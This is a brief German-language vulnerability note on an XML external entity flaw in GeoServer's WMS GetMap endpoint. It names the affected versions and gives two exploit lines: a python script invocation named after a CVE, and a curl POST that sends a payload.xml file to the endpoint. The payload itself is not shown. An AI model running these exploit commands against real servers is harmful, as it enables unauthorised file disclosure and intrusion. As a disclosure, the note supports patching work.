
XXE über einen bestimmten Endpunkt /geoserver/wms Operation GetMap - Geoserver
Von Version 2.26.0 bis vor 2.26.2 und vor 2.25.6 wurde eine XML-External-Entity-(XXE)-Sicherheitslücke identifiziert. Die Anwendung akzeptiert XML-Eingaben über einen bestimmten Endpunkt /geoserver/wms, Operation GetMap

Exploit1:
python3 CVE-2025-58360 -u http://example.com
Exploit2:
curl -X POST "http://example.com/geoserver/wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90" -H "Content-Type: application/xml" --data-binary @payload.xml -o output.png